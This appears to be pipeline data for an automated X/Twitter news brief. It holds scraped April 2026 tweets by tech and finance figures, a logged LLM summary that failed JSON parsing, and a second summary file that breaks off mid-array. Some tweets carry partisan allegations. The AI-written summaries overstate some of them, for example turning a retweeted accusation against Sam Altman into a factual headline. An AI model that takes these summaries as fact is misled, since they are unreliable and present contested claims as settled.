{"handle": "GaryMarcus", "name": "Gary Marcus", "published_at": "2026-04-27T02:41:14+00:00", "title": "“Always keep a separate backup.” For sure, every experienced programmer should know this.\n\n𝘉𝘶𝘵 𝘸𝘦 𝘫𝘶𝘴𝘵 𝘤𝘳𝘦𝘢𝘵𝘦𝘥 𝘢 𝘸𝘩𝘰𝘭𝘦 𝘨𝘦𝘯𝘦𝘳𝘢𝘵𝘪𝘰𝘯 𝘰𝘧 𝘷𝘪𝘣𝘦 𝘤𝘰𝘥𝘦𝘳𝘴 𝘸𝘩𝘰 𝘥𝘰𝘯’𝘵.\n\nAnd we now have a legion of synthetic coding agents (like Cursor) that also apparently don’t always follow this basic princ", "url": "https://x.com/GaryMarcus/status/2048593283639894520"}, {"handle": "pmarca", "name": "Marc Andreessen", "published_at": "2026-04-27T02:34:50+00:00", "title": "👀", "url": "https://x.com/pmarca/status/2048591674688037210"}, {"handle": "elonmusk", "name": "Elon Musk", "published_at": "2026-04-27T02:26:57+00:00", "title": "Curiosity & adventure are my philosophy\n\nhttps://grok.com/share/bGVnYWN5_d70e0164-cced-4096-99cb-38604067aa7a", "url": "https://x.com/elonmusk/status/2048589691054694406"}, {"handle": "GaryMarcus", "name": "Gary Marcus", "published_at": "2026-04-27T02:25:10+00:00", "title": "RT by @GaryMarcus: “fails less often than a human does” is a terrible metric. \n \nWe build deterministic software and test it to destruction to ensure it’s 99.99999 reliable . That’s been the basis of every critical application such as accounting payroll and logistics. \n\nLLMs can", "url": "https://x.com/GaryMarcus/status/2048589239915577837"}, {"handle": "pmarca", "name": "Marc Andreessen", "published_at": "2026-04-27T02:25:08+00:00", "title": "Overheard in Silicon Valley: \"Did a Claw post this?\"", "url": "https://x.com/pmarca/status/2048589233095643240"}, {"handle": "GaryMarcus", "name": "Gary Marcus", "published_at": "2026-04-27T01:59:04+00:00", "title": "RT by @GaryMarcus: the beauty of a jagged frontier\nis that every failure is the user's fault\nand every breakthrough is the model's glory", "url": "https://x.com/GaryMarcus/status/2048582672163995766"}, {"handle": "jason", "name": "Jason Calacanis", "published_at": "2026-04-27T01:51:02+00:00", "title": "Incredible writing from @euphoriaHBO", "url": "https://x.com/jason/status/2048580651985604783"}, {"handle": "GaryMarcus", "name": "Gary Marcus", "published_at": "2026-04-27T01:48:56+00:00", "title": "RT by @GaryMarcus: I mean AI influencers here and everywhere are screaming you shouldn't get hired if you don't use agentic AI because you're deliberatly slowing everyone down and the moment something goes wrong it's your fault because you didn't understand the tool?", "url": "https://x.com/GaryMarcus/status/2048580122521780676"}, {"handle": "GaryMarcus", "name": "Gary Marcus", "published_at": "2026-04-27T01:44:47+00:00", "title": "RT by @GaryMarcus: The only AGI that Sam Altman is after is Adjusted Gross Income.", "url": "https://x.com/GaryMarcus/status/2048579079121555764"}, {"handle": "GaryMarcus", "name": "Gary Marcus", "published_at": "2026-04-27T01:40:43+00:00", "title": "the difference is that we don’t *hype* giving 12 year-olds bulldozers.\n\n*of course* it’s a kind of user error when a model destroys all of user’s data and they didn’t have a backup. that’s the point.\n\nvibe coding without considerable experience is like driving without a license.", "url": "https://x.com/GaryMarcus/status/2048578055283880296"}, {"handle": "pmarca", "name": "Marc Andreessen", "published_at": "2026-04-27T01:20:46+00:00", "title": "Overheard in Silicon Valley: \"Now, software is just the prompt for the next version of the software.\"", "url": "https://x.com/pmarca/status/2048573035616375134"}, {"handle": "GaryMarcus", "name": "Gary Marcus", "published_at": "2026-04-27T01:09:02+00:00", "title": "RT by @GaryMarcus: Never ever use generative AI for anything critical. \n\nThe technology is probablistic all the way down and therefore inherently unreliable. \n\nWhy is this so hard to understand? \n\nIt’s wild how many seemingly smart people have drunk the cool aid on this.", "url": "https://x.com/GaryMarcus/status/2048570082843082905"}, {"handle": "GaryMarcus", "name": "Gary Marcus", "published_at": "2026-04-27T01:00:07+00:00", "title": "Generative AI as the Hindenberg", "url": "https://x.com/GaryMarcus/status/2048567837221089669"}, {"handle": "GaryMarcus", "name": "Gary Marcus", "published_at": "2026-04-27T00:25:00+00:00", "title": "Is it me or X starting to look like a vibe coded mess?\n\nPolls are broken.\n\nAccounts are getting hacked.\n\nMy DMs are full of phishing scams.\n\nBasics that used to work no longer work.", "url": "https://x.com/GaryMarcus/status/2048558998325166498"}, {"handle": "sama", "name": "Sam Altman", "published_at": "2026-04-27T00:05:31+00:00", "title": "so fun to see the reception to 5.5!\n\nthere is almost nothing that feels more gratifying to me than builders saying they find our tools useful.", "url": "https://x.com/sama/status/2048554097985593849"}, {"handle": "GaryMarcus", "name": "Gary Marcus", "published_at": "2026-04-27T00:02:43+00:00", "title": "R to @GaryMarcus: btw polling software is broken! votes aren’t showing, as many folks have noted. eg I see none:", "url": "https://x.com/GaryMarcus/status/2048553390540734479"}, {"handle": "GaryMarcus", "name": "Gary Marcus", "published_at": "2026-04-27T00:00:53+00:00", "title": "Total AI disaster, totally predictable", "url": "https://x.com/GaryMarcus/status/2048552931923013916"}, {"handle": "sama", "name": "Sam Altman", "published_at": "2026-04-26T23:59:53+00:00", "title": "Our Principles:\n\nDemocratization, Empowerment, Universal Prosperity, Resilience, and Adaptability\n\nhttps://openai.com/index/our-principles/", "url": "https://x.com/sama/status/2048552677433643427"}, {"handle": "elonmusk", "name": "Elon Musk", "published_at": "2026-04-26T23:22:48+00:00", "title": "Remember this", "url": "https://x.com/elonmusk/status/2048543344746250466"}, {"handle": "elonmusk", "name": "Elon Musk", "published_at": "2026-04-26T22:50:49+00:00", "title": "Grad school indoctrination camps", "url": "https://x.com/elonmusk/status/2048535299102265720"}, {"handle": "HarryStebbings", "name": "Harry Stebbings", "published_at": "2026-04-26T22:34:46+00:00", "title": "We hired someone for the investing team. \n\nSomething I never planned to do. \n\nThey sent the team 3 new deals per day for 90 days straight. \n\nAll aligned to our stage, geography and deal type. \n\nThat’s how you hustle and get a job in VC. \n\nStay tuned. Reveal to come.", "url": "https://x.com/HarryStebbings/status/2048531257399664920"}, {"handle": "pmarca", "name": "Marc Andreessen", "published_at": "2026-04-26T21:32:43+00:00", "title": "Many such cases.", "url": "https://x.com/pmarca/status/2048515643268567431"}, {"handle": "elonmusk", "name": "Elon Musk", "published_at": "2026-04-26T21:21:33+00:00", "title": "RT by @elonmusk: 🚨BREAKING: I found Cole Allen's archived tweets.\n\nHe predicted \"Kamala wins all swing states,\" compared Trump's win to “Nazis getting elected,” and moved to Bluesky.\n\nThe scary part: he retweeted every mainstream Democrat on this platform.\n\nThread below. 👇\n\nWhat ", "url": "https://x.com/elonmusk/status/2048512831692452091"}, {"handle": "DavidSacks", "name": "David Sacks", "published_at": "2026-04-26T20:42:24+00:00", "title": "MSM hoax factories like the Atlantic love to allege conflicts of interest without ever disclosing their own.", "url": "https://x.com/DavidSacks/status/2048502978626113625"}, {"handle": "jason", "name": "Jason Calacanis", "published_at": "2026-04-26T19:42:30+00:00", "title": "I’ve invested in 700 private companies \n\nProviding liquidity and loans to high performing founders is completely standard. \n\nIn fact, investors encourage loans and secondary sales for founders to enable them to go for the Gold — which is exactly what SpaceX has done. \n\nThe @NYTim", "url": "https://x.com/jason/status/2048487905543237675"}, {"handle": "HarryStebbings", "name": "Harry Stebbings", "published_at": "2026-04-26T19:35:39+00:00", "title": "I have interviewed 1,000 of the best CEOs of the last 10 years. \n\nAdam Foroughi, Founder @AppLovin is easily top 3, ever. \n\n$160BN Market Cap \n\n$5.48BN Revenue\n\n$10M EBITDA per head \n\n82%+ margins\n\nJust 450 people in core business 🤯 \n\nNo other business on the planet has numbers l", "url": "https://x.com/HarryStebbings/status/2048486182904852537"}, {"handle": "ylecun", "name": "Yann LeCun", "published_at": "2026-04-26T18:31:11+00:00", "title": "RT by @ylecun: Republicans have been making this argument my entire life. We had 8 years of Clinton, 8 years of Obama, 4 years of Biden— never became a socialism. But you know what we got? More jobs, lower unemployment, higher GDP in Democratic administrations than every GOP admi", "url": "https://x.com/ylecun/status/2048469956627468510"}, {"handle": "jason", "name": "Jason Calacanis", "published_at": "2026-04-26T18:14:04+00:00", "title": "Ok @Acosta, balls in your court", "url": "https://x.com/jason/status/2048465651723882972"}, {"handle": "jason", "name": "Jason Calacanis", "published_at": "2026-04-26T18:05:09+00:00", "title": "The NYTimes focus last week was micro-looting, social murder and meaningless private company transactions designed to ferment class warfare.\n\nDisgraziad", "url": "https://x.com/jason/status/2048463405590225173"}, {"handle": "DavidSacks", "name": "David Sacks", "published_at": "2026-04-26T17:37:26+00:00", "title": "RT by @DavidSacks: Accurate", "url": "https://x.com/DavidSacks/status/2048456433981591867"}, {"handle": "ylecun", "name": "Yann LeCun", "published_at": "2026-04-26T17:27:23+00:00", "title": "RT by @ylecun: Trump just fired all 24 members of the National Science Board. Every single one. By email. No warning. No reason given. The board has existed since 1950.\n\nThe National Science Board is the independent body that oversees the National Science Foundation, the agency t", "url": "https://x.com/ylecun/status/2048453901930660058"}, {"handle": "jason", "name": "Jason Calacanis", "published_at": "2026-04-26T17:13:01+00:00", "title": "Who made this?!", "url": "https://x.com/jason/status/2048450286902235560"}, {"handle": "jason", "name": "Jason Calacanis", "published_at": "2026-04-26T16:21:34+00:00", "title": "I’m proud to announce I’m hosting an exhibition cage match between @Acosta and @mtracey on July 4th \n\n$100,000 cash prize \n\nVegas \n\n3, 3 minute rounds", "url": "https://x.com/jason/status/2048437340218044499"}, {"handle": "charliebilello", "name": "Charlie Bilello", "published_at": "2026-04-26T16:18:48+00:00", "title": "RT by @charliebilello: Does a government shutdown negatively impact the stock market?\n\nNo.\n\nThe S&P 500 has gained an average of 0.4% during prior shutdowns and is up 4.8% during the current shutdown which is the longest in history at 70 days and counting.\n\n$SPX", "url": "https://x.com/charliebilello/status/2048436641451155650"}, {"handle": "jason", "name": "Jason Calacanis", "published_at": "2026-04-26T16:16:34+00:00", "title": "Once again, the substack party result in a Donnybrook — it’s like the source awards for wordmaxxers", "url": "https://x.com/jason/status/2048436081725464959"}, {"handle": "elonmusk", "name": "Elon Musk", "published_at": "2026-04-26T16:14:38+00:00", "title": "RT by @elonmusk: 25% of very liberal people say political violence can “sometimes be justified.”\n\nAmong very conservative people it’s just 3%.\n\nIn other words, the far left is 8x more likely to support political violence as the far right.\n\nStop pretending this is a “both sides” p", "url": "https://x.com/elonmusk/status/2048435593244237849"}, {"handle": "ylecun", "name": "Yann LeCun", "published_at": "2026-04-26T16:03:04+00:00", "title": "RT by @ylecun: Existential risk mongers are a small, very vocal cult with a lot of very clever online astroturfing skills. \n\nPoliticians never waste a good fake crisis, which is why they're perfect for Bernie to try to seize the means of production back from the private sphere.\n\n", "url": "https://x.com/ylecun/status/2048432684930654430"}, {"handle": "sama", "name": "Sam Altman", "published_at": "2026-04-26T15:46:41+00:00", "title": "feels like a good time to seriously rethink how operating systems and user interfaces are designed\n\n(also the internet; there should be a protocol that is equally usable by people and agents)", "url": "https://x.com/sama/status/2048428561481265539"}, {"handle": "sama", "name": "Sam Altman", "published_at": "2026-04-26T15:37:00+00:00", "title": "\"post-AGI, no one is going to work and the economy is going to collapse\"\n\n\"i am switching to polyphasic sleep because GPT-5.5 in codex is so good that i can't afford to be sleeping for such long stretches and miss out on working\"", "url": "https://x.com/sama/status/2048426122854228141"}, {"handle": "charliebilello", "name": "Charlie Bilello", "published_at": "2026-04-26T15:10:21+00:00", "title": "RT by @charliebilello: The 12.5% gain in the S&P 500 over the last 4 weeks was the 20th biggest 4-week advance for the index since 1950. $SPX\n\nVideo: https://www.youtube.com/watch?v=p5e0ThPjIAg&t=646s", "url": "https://x.com/charliebilello/status/2048419415222259820"}, {"handle": "HarryStebbings", "name": "Harry Stebbings", "published_at": "2026-04-26T15:07:55+00:00", "title": "Seeing two types of founders emerge in this moment:\n\nThe tourists and the terminators. \n\nThe terminators are salivating at the opportunity ahead. Hungrier than ever. More ambitious than ever. They want it more than ever. \n\nThe tourists. They want to sell. They are scared. They do", "url": "https://x.com/HarryStebbings/status/2048418806867870115"}, {"handle": "DavidSacks", "name": "David Sacks", "published_at": "2026-04-26T15:03:35+00:00", "title": "RT by @DavidSacks: Cole Allen, the gunman from last night’s WH Correspondents Dinner, maintained an active online presence, especially on the leftwing social media platform Bluesky where he went by the handle http://ColdForce.bsky.social with multiple references violence and guns", "url": "https://x.com/DavidSacks/status/2048417712439689346"}, {"handle": "paulg", "name": "Paul Graham", "published_at": "2026-04-26T14:48:06+00:00", "title": "RT by @paulg: Yeah okay, Lego bros, brodettes and brotheys are cooked with this one.\n\nGPT 2 Image can create full Lego sets! With actual Bricklink IDs so you can order the parts and build it.\n\nWhole new business opportunity here for the taking.", "url": "https://x.com/paulg/status/2048413815675539816"}, {"handle": "paulg", "name": "Paul Graham", "published_at": "2026-04-26T14:47:09+00:00", "title": "Every post, I block and report a couple accounts using AI-generated replies. It feels much the same as picking up litter on a city street; I don't know if it has any effect, but it feels like I ought to at least try to keep the site clean.", "url": "https://x.com/paulg/status/2048413578789634100"}, {"handle": "paulg", "name": "Paul Graham", "published_at": "2026-04-26T14:40:28+00:00", "title": "Durer was the original Dr Seuss.", "url": "https://x.com/paulg/status/2048411898081583547"}, {"handle": "paulg", "name": "Paul Graham", "published_at": "2026-04-26T14:36:59+00:00", "title": "Writing a talk to give in Stockholm. The prospect of speaking to a large group of people is no longer frightening, but writing a talk is as much work as ever. I'm no longer afraid of audiences, but I'm still just as afraid of making mistakes.", "url": "https://x.com/paulg/status/2048411021329453562"}, {"handle": "charliebilello", "name": "Charlie Bilello", "published_at": "2026-04-26T14:19:13+00:00", "title": "RT by @charliebilello: The stock market is at an all-time high.\n\nCredit spreads are near all-time lows.\n\nAnd inflation has been above the Fed's target level for 61 consecutive months, averaging 4% per year since 2019.\n\nSo why is the Fed expanding its balance sheet (QE)?\n\nVideo: h", "url": "https://x.com/charliebilello/status/2048406550897729561"}, {"handle": "charliebilello", "name": "Charlie Bilello", "published_at": "2026-04-26T14:00:02+00:00", "title": "RT by @charliebilello: On March 30, the S&P 500 was down 7% in 2026, the 12th worst start to a year in history. After one of the biggest 4-week rallies ever, it's now up +5% YTD and above the average year at this point in time (+3%). There is no impossible in markets.\n\nVideo: htt", "url": "https://x.com/charliebilello/status/2048401720540061794"}, {"handle": "HarryStebbings", "name": "Harry Stebbings", "published_at": "2026-04-26T13:56:31+00:00", "title": "The best founders I know all text their investors. \n\nNone of them email them. \n\nThe relationship will blossom and deepen in a matter of messages.", "url": "https://x.com/HarryStebbings/status/2048400836024283246"}, {"handle": "jason", "name": "Jason Calacanis", "published_at": "2026-04-26T13:51:54+00:00", "title": "RT by @Jason: Random pic of @Jason protecting our $TAO bags", "url": "https://x.com/jason/status/2048399674269213067"}, {"handle": "ylecun", "name": "Yann LeCun", "published_at": "2026-04-26T13:51:41+00:00", "title": "Shooting oneself in the foot?\nNope.\nShooting oneself in the prefrontal cortex.", "url": "https://x.com/ylecun/status/2048399621492236615"}, {"handle": "charliebilello", "name": "Charlie Bilello", "published_at": "2026-04-26T13:45:00+00:00", "title": "RT by @charliebilello: Global Inflation Rates are on the RISE...\n\nVideo: https://www.youtube.com/watch?v=p5e0ThPjIAg&t=1433s", "url": "https://x.com/charliebilello/status/2048397937156518387"}, {"handle": "paulg", "name": "Paul Graham", "published_at": "2026-04-26T13:37:21+00:00", "title": "RT by @paulg: 'Action is now needed': Over 60 ex-U.K. ambassadors call to sanction Israel over West Bank\nhttps://www.haaretz.com/west-bank/2026-04-26/ty-article/.premium/over-60-ex-uk-ambassadors-call-to-sanction-israel-over-west-bank/0000019d-c950-d11b-a7df-ef5a5fba0000", "url": "https://x.com/paulg/status/2048396013816152216"}, {"handle": "charliebilello", "name": "Charlie Bilello", "published_at": "2026-04-26T13:30:00+00:00", "title": "RT by @charliebilello: With the exception of Bitcoin, every major asset class is now in positive territory on the year...\n\nVideo: https://www.youtube.com/watch?v=p5e0ThPjIAg&t=973s", "url": "https://x.com/charliebilello/status/2048394162366533935"}, {"handle": "charliebilello", "name": "Charlie Bilello", "published_at": "2026-04-26T13:14:49+00:00", "title": "RT by @charliebilello: The S&P 500 ended the week at another all-time high, its 9th of the year. $SPX\n\nVideo: https://www.youtube.com/watch?v=p5e0ThPjIAg&t=646s", "url": "https://x.com/charliebilello/status/2048390341221404827"}, {"handle": "paulg", "name": "Paul Graham", "published_at": "2026-04-26T11:57:10+00:00", "title": "Good use of camouflage by Biscuit.", "url": "https://x.com/paulg/status/2048370801833828507"}, {"handle": "JeffDean", "name": "Jeff Dean", "published_at": "2026-04-26T10:41:25+00:00", "title": "RT by @JeffDean: THE FIRST MAN IN HISTORY TO BREAK 2 HOURS IN A MARATHON!!!🤯🤯🤯\n\nSabastian Sawe 🇰🇪 has just shattered the World Record at the London Marathon, running 1:59:30!!!\n\nHe makes history as the first man to officially break 2 hours in the marathon.\n\nYomif Kejelcha 🇪🇹 in h", "url": "https://x.com/JeffDean/status/2048351736037826877"}, {"handle": "ylecun", "name": "Yann LeCun", "published_at": "2026-04-26T06:48:29+00:00", "title": "RT by @ylecun: Never let critical thinking get in the way of extremist fantasy stories.\n\nIf you're on either side of this slider, congratulations, you may be a child in an adult costume body!\n\nBlack and white thinking is for children. \n\nWhen you become an adult it's time to put a", "url": "https://x.com/ylecun/status/2048293118781296734"}, {"handle": "jason", "name": "Jason Calacanis", "published_at": "2026-04-26T03:57:07+00:00", "title": "The left has a serious violence problem, which @DavidSacks called out early and often. \n\nThis generation of woke democratic socialists are morally bankrupt. \n\nThey believe in looting and violence as a political tool — and they’re vocal about it. \n\nIf you called out the violent me", "url": "https://x.com/jason/status/2048249992163242220"}, {"handle": "jason", "name": "Jason Calacanis", "published_at": "2026-04-26T03:46:17+00:00", "title": "If you’re not condemning these lunatics, you’re advocating for the end of the American empire. \n\nI’m not for canceling people, but the fact the @nytimes and @newyorker not only employees these individuals, but selects them to represent their brands, shows exactly how bankrupt the", "url": "https://x.com/jason/status/2048247267182658004"}] diff --git a/data/x_brief/debug/20260428_010738_l1_output_error.json b/data/x_brief/debug/20260428_010738_l1_output_error.json new file mode 100644 index 0000000..32358bd --- /dev/null +++ b/data/x_brief/debug/20260428_010738_l1_output_error.json @@ -0,0 +1,4 @@ +{ + "parse_error": "Expecting ',' delimiter: line 1 column 6529 (char 6528)", + "raw_text": "\n\n{\"themes\":[{\"id\":\"t1\",\"title\":\"GPT-5.5发布震撼业界\",\"subtitle\":\"Coding Agent进入实用阶段,AI编程实践加速\",\"bullets\":[\"GPT-5.5和GPT-5.5 Pro已在API中可用,OpenAI全员庆祝发布\",\"Perplexity将GPT-5.5设为默认编排模型,成本效率提升\",\"Codex应用新增浏览器控制、办公文档支持、操作系统级语音\",\"AI可代替研究员运行实验变体 overnight,有研究伙伴潜质\"],\"samples\":[{\"text\":\"GPT-5.5 and GPT-5.5 Pro are now available in the API!\",\"url\":\"https://x.com/sama/status/2047787124846653895\",\"handle\":\"@sama\",\"date\":\"2026-04-24\"},{\"text\":\"You would consume less computer credits if you switched to GPT-5.5 as your default orchestrator. This was the number one complaint about Computer.\",\"url\":\"https://x.com/AravSrinivas/status/2047788775468908840\",\"handle\":\"@AravSrinivas\",\"date\":\"2026-04-24\"},{\"text\":\"there are early signs of 5.5 being a competent ai research partner...wake up to finished experiments\",\"url\":\"https://x.com/sama/status/2047386955550470245\",\"handle\":\"@sama\",\"date\":\"2026-04-23\"}]},{\"id\":\"t2\",\"title\":\"AI下一个方向:重新设计OS与UI\",\"subtitle\":\"Sam Altman预告平台级变革, Andreessen提醒软件自演进\",\"bullets\":[\"Sam Altman:现在是认真重新思考操作系统和UI设计的时机\",\"互联网应有协议同时适用于人和AI Agent\",\"Marc Andreessen:软件变成下一个版本的prompt\"],\"samples\":[{\"text\":\"feels like a good time to seriously rethink how operating systems and user interfaces are designed (also the internet; there should be a protocol that is equally usable by people and agents)\",\"url\":\"https://x.com/sama/status/2048428561481265539\",\"handle\":\"@sama\",\"date\":\"2026-04-26\"},{\"text\":\"Now, software is just the prompt for the next version of the software.\",\"url\":\"https://x.com/pmarca/status/2048573035616375134\",\"handle\":\"@pmarca\",\"date\":\"2026-04-27\"},{\"text\":\"When one thing becomes abundant and cheap, another thing becomes scarce and valuable.\",\"url\":\"https://x.com/pmarca/status/2048624098398650608\",\"handle\":\"@pmarca\",\"date\":\"2026-04-27\"}]},{\"id\":\"t3\",\"title\":\"AI Agents风险警示与估值泡沫信号\",\"subtitle\":\"Gary Marcus持续质疑Agent安全性;市场估值接近2000年互联网泡沫\",\"bullets\":[\"Gary Marcus:AI agents是过早推出的技术,用户数据丢失背后是AI安全问题\",\"S&P 500的CAPE比率升至41,创2000年以来最高,超越99%历史估值\",\"S&P 500一季度盈利同比增长15%,连续13个季度正增长\"],\"samples\":[{\"text\":\"AI agents are wildly premature technology that is being rolled out way too fast. The deepest lesson is NOT about losing your data. It's about AI safety.\",\"url\":\"https://x.com/GaryMarcus/status/2048757233174122827\",\"handle\":\"@GaryMarcus\",\"date\":\"2026-04-27\"},{\"text\":\"The S&P 500's CAPE Ratio has moved up to 41, its highest level since 2000 and now above 99% of historical valuations.\",\"url\":\"https://x.com/charliebilello/status/2048753179471323584\",\"handle\":\"@charliebilello\",\"date\":\"2026-04-27\"},{\"text\":\"The apps can rewrite the files.\",\"url\":\"https://x.com/pmarca/status/2048615807190769738\",\"handle\":\"@pmarca\",\"date\":\"2026-04-27\"}]}],\"p0_events\":[{\"id\":\"p01\",\"title\":\"OpenAI与微软更新合作关系\",\"meta\":\"2026-04-27 | @sama\",\"summary\":\"微软仍是主要云伙伴,但OpenAI产品和服务的可获取性扩展到全云平台,协议延续至2030年\",\"url\":\"https://x.com/sama/status/2048755148361707946\"},{\"id\":\"p02\",\"title\":\"GPT-5.5 Codex能力跃升\",\"meta\":\"2026-04-24 | OpenAI\",\"summary\":\"Codex应用新增浏览器控制 Sheets/幻灯片编辑、文档PDF处理、操作系统级语音输入、自动审查模式\",\"url\":\"https://x.com/sama/status/2047381565534322694\"},{\"id\":\"p03\",\"title\":\"美股估值创2000年以来新高\",\"meta\":\"2026-04-27 | @charliebilello\",\"summary\":\"S&P 500 CAPE比率升至41,超越99%历史估值;一季度盈利同比增长15%\",\"url\":\"https://x.com/charliebilello/status/2048753179471323584\"},{\"id\":\"p04\",\"title\":\"AI原生软件工程团队运作差异\",\"meta\":\"2026-04-27 | @AndrewYNg\",\"summary\":\"AI-native团队使用coding agents快速构建产品,引发运营方式根本性变化\",\"url\":\"https://x.com/AndrewYNg/status/2048793852702757151\"},{\"id\":\"p05\",\"title\":\"Kimi K2.6开源模型发布\",\"meta\":\"2026-04-23 | Moonshot AI\",\"summary\":\"Kimi K2.6成为新SOTA开源权重模型,支持Pro和Max订阅\",\"url\":\"https://x.com/AravSrinivas/status/2047145172337836139\"},{\"id\":\"p06\",\"title\":\"OpenAI开源监控评估工具\",\"meta\":\"2026-04-24 | OpenAI\",\"summary\":\"开源多项monitorability evaluations,供研究社区使用\",\"url\":\"https://x.com/sama/status/2047473914528563592\"}],\"top_quotes\":[{\"id\":\"q1\",\"quote\":\"feels like a good time to seriously rethink how operating systems and user interfaces are designed\",\"speaker\":\"Sam Altman\",\"date\":\"2026-04-26\",\"note\":\"可能推动下一代平台诞生\",\"url\":\"https://x.com/sama/status/2048428561481265539\"},{\"id\":\"q2\",\"quote\":\"AI agents are wildly premature technology that is being rolled out way too fast.\",\"speaker\":\"Gary Marcus\",\"date\":\"2026-04-27\",\"note\":\"重申对Agent安全的担忧\",\"url\":\"https://x.com/GaryMarcus/status/2048757233174122827\"},{\"id\":\"q3\",\"quote\":\"When one thing becomes abundant and cheap, another thing becomes scarce and valuable.\",\"speaker\":\"Marc Andreessen\",\"date\":\"2026-04-27\",\"note\":\"对AI时代资源价值转变的洞察\",\"url\":\"https://x.com/pmarca/status/2048624098398650608\"}],\"category_updates\":[{\"id\":\"c1\",\"title\":\"AI编程工具\",\"subtitle\":\"工具链快速迭代,实操性增强\",\"level\":\"P0\",\"items\":[{\"text\":\"GPT-5.5已在API可用,Codex新增Browser control和OS级语音\",\"url\":\"https://x.com/sama/status/2047787124846653895\"},{\"text\":\"Perplexity将GPT-5.5设为默认编排模型,提升成本效率\",\"url\":\"https://x.com/AravSrinivas/status/2047788775468908840\"}]},{\"id\":\"c2\",\"title\":\"市场数据与宏观\",\"subtitle\":\"估值偏高信号\",\"level\":\"P1\",\"items\":[{\"text\":\"S&P 500 CAPE比率41,创2000年来最高,超越99%历史估值\",\"url\":\"https://x.com/charliebilello/status/2048753179471323584\"},{\"text\":\"S&P 500一季度盈利同比+15%,连续13个季度正增长\",\"url\":\"https://x.com/charliebilello/status/2048751094671585397\"},{\"text\":\"2026年过去4周涨幅12.5%,为1950年以来第20大四周涨幅\",\"url\":\"https://x.com/charliebilello/status/2048419415222259820\"}]},{\"id\":\"c3\",\"title\":\"AI安全与反思\",\"subtitle\":\"风险警示持续\",\"level\":\"P1\",\"items\":[{\"text\":\"Gary Marcus:vibe coding without backup是用户导致的系统性风险\",\"url\":\"https://x.com/GaryMarcus/status/2048742983684784239\"},{\"text\":\"AI agents是过早推出的技术,核心问题是安全性而非数据丢失\",\"url\":\"https://x.com/GaryMarcus/status/2048757233174122827\"}]},{\"id\":\"c4\",\"title\":\"行业方向判断\",\"subtitle\":\"顶级玩家战略思考\",\"level\":\"P1\",\"items\":[{\"text\":\"Sam Altman:应重新设计OS/UI,互联网协议需同时支持人和AI\",\"url\":\"https://x.com/sama/status/2048428561481265539\"},{\"text\":\"Andrew Ng:AI-native团队使用coding agents,运营方式根本性变化\",\"url\":\"https://x.com/AndrewYNg/status/2048793852702757151\"}]},{\"id\":\"c5\",\"title\":\"VC与创业洞见\",\"subtitle\":\"从业者视角\",\"level\":\"P2\",\"items\":[{\"text\":\"Paul Graham:担心初创公司被模型公司吃掉像担心成为电影明星后生活受限\",\"url\":\"https://x.com/paulg/status/2048677984106664227\"},{\"text\":\"Harry Stebbings:当前出现两种创始人类型——观光客vs终结者\",\"url\":\"https://x.com/HarryStebbings/status/2048418806867870115\"}]},{\"id\":\"c6\",\"title\":\"开源模型进展\",\"subtitle\":\"模型层活跃\",\"level\":\"P2\",\"items\":[{\"text\":\"Moonshot发布Kimi K2.6,新SOTA开源权重模型\",\"url\":\"https://x.com/AravSrinivas/status/2047145172337836139\"},{\"text\":\"Perplexity在Qwen基础上训练出成本-准确度Pareto最优模型\",\"url\":\"https://x.com/AravSrinivas/status/2047019688920756504\"}]}],\"risk_signals\":[{\"id\":\"r1\",\"level\":\"HIGH\",\"title\":\"AI Agent安全风险累积\",\"detail\":\"Gary Marcus持续警示:vibe-coded agents导致数据丢失事故频发,核心是AI safety问题未解决,用户在未充分备份情况下让AI访问文件\"},\"id\":\"r2\",\"level\":\"HIGH\",\"title\":\"市场估值接近互联网泡沫\",\"detail\":\"S&P 500 CAPE比率41,创2000年以来最高,超越99%历史估值水平,投资者需警惕回调风险\"},\"id\":\"r3\",\"level\":\"MID\",\"title\":\" Musk与Altman法律纠纷\",\"detail\":\"Musk起诉OpenAI及Altman,称其为'Scam Altman',指控涉及公司治理和利益冲突,庭审正在进行\"},{\"id\":\"r4\",\"level\":\"MID\",\"title\":\"AI工具过度炒作风险\",\"detail\":\"Gary Marcus:'把自动补全叫AI,把循环中的自动补全叫agent'是本世纪最大营销谎言,实际能力与宣传不符\"},{\"id\":\"r5\",\"level\":\"OPP\",\"title\":\"AI投资机会显现\",\"detail\":\"S&P 500连续13个季度盈利正增长,一季度+15%;技术迭代加速(GPT-5.5),掌握新工具的团队效率显著提升\"},{\"id\":\"r6\",\"level\":\"MID\",\"title\":\"OpenAI多云策略突破\",\"detail\":\"与微软关系更新但保持合作,同时可跨全云部署产品,云计算格局可能出现分化\"}]}" +} \ No newline at end of file diff --git a/data/x_brief/debug/20260428_010810_l2_input.json b/data/x_brief/debug/20260428_010810_l2_input.json new file mode 100644 index 0000000..547c789 --- /dev/null +++ b/data/x_brief/debug/20260428_010810_l2_input.json @@ -0,0 +1,28 @@ +{ + "target_indexes": [ + 0, + 1, + 2 + ], + "target_count": 3, + "targets": [ + { + "idx": 0, + "handle": "elonmusk", + "url": "https://x.com/elonmusk/status/2048807976991850953", + "title": "Calling him “Scam” Altman is accurate. \n\nThis is very much worth reading." + }, + { + "idx": 1, + "handle": "elonmusk", + "url": "https://x.com/elonmusk/status/2048804363595059425", + "title": "RT by @elonmusk: Sam Altman cannot be trusted.\n\n• The OpenAI board fired him because he was not always honest with them. They said he should not control powerful AI.\n\n• A major report talked to over 100 people and saw secret papers. It says he has almost a sociopathic lack of concern for the truth. People who worked with him say he lies easily but still wants everyone to like him.\n\n• Top scientist Ilya made 70 pages of notes before the firing. They showed Sam was not honest with the team and board about safety rules.\n\n• He changed OpenAI from a nonprofit that Elon helped start to a for profit money making business. It was meant to be open for everyone with no personal gain.\n\n• He trained OpenAI on Twitter data without permission.\n\n• He keeps lying and shows a lack of transparency.\n\n• He poached xAI staff and took sensitive info illegally.\n\n• He dropped core safety promises to race for growth and money. Old team members say his big expensive AI projects around the world are too dangerous.\n\n• An ex OpenAI board member flat out called him a liar.\n\nThis is not just talk. It is what the people closest to him said and what the facts show. When the folks who worked with him say he cannot be trusted." + }, + { + "idx": 2, + "handle": "elonmusk", + "url": "https://x.com/elonmusk/status/2048802239272169582", + "title": "Exactly" + } + ] +} \ No newline at end of file diff --git a/data/x_brief/debug/20260428_010810_l2_output.json b/data/x_brief/debug/20260428_010810_l2_output.json new file mode 100644 index 0000000..d81aba8 --- /dev/null +++ b/data/x_brief/debug/20260428_010810_l2_output.json @@ -0,0 +1,12 @@ +{ + "target_indexes": [ + 0, + 1, + 2 + ], + "broadcast_zh": [ + "OpenAI创始人因诚信问题遭董事会解职,行业呼吁加强AI技术治理监管", + 